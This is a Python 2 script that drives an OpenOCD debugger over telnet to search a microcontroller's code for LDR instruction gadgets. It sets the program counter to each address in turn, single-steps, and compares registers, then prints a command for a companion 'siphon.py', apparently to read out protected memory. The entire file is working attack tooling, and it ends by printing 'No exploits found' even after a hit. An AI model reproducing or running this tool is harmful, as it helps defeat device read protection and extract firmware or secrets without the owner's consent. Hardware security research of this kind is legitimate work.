find_exploit.py

#!/usr/bin/python

import sys
import telnetlib

import helpers

print("Connecting to Open OCD server at localhost:4444")
tn = telnetlib.Telnet("localhost", 4444)

print("Searching for LDR exploits")

pc, msp = helpers.find_pcs(tn)
print("Program counter is " + hex(pc))
print("Program counter (banked) is " + hex(msp))

pc_start = pc
pc_end = pc + 0x100
print("Testing pc from " + hex(pc_start) + " up to " + hex(pc_end))
for i in xrange(pc_start, pc_end, 4):
    helpers.halt(tn)
    print("Setting program counter to " + hex(i))
    helpers.reg_set(tn, "pc", i)
    helpers.reg_set_all(tn, 0)
    helpers.step(tn)
    for j in range(0, 13):
        val = helpers.reg_get(tn, "r" + str(j))
        if val == msp:
            print("Found candidate: r" + str(j) + " == " + hex(msp) + " (MSP)")
            for k in range(0, 13):
                if k != j:
                    helpers.reg_set(tn, "pc", i)
                    helpers.reg_set_all(tn, 0)
                    helpers.reg_set(tn, "r" + str(k), 4)
                    helpers.step(tn)
                    newval = helpers.reg_get(tn, "r" + str(j))
                    if newval != val:
                        print("Exploit found at pc=" + hex(i) + ": approx. LDR R" + str(j) + ", [R" + str(k) + "]")
                        print("Assenbly: " + hex(helpers.siphon(tn, i, i, k, j)))
                        print("CLI: ./siphon.py " + hex(i) + " " + str(k) + " " + str(j))
                        # tn.write("exit\n")
                        # sys.exit()

tn.write("exit\n")
print("No exploits found")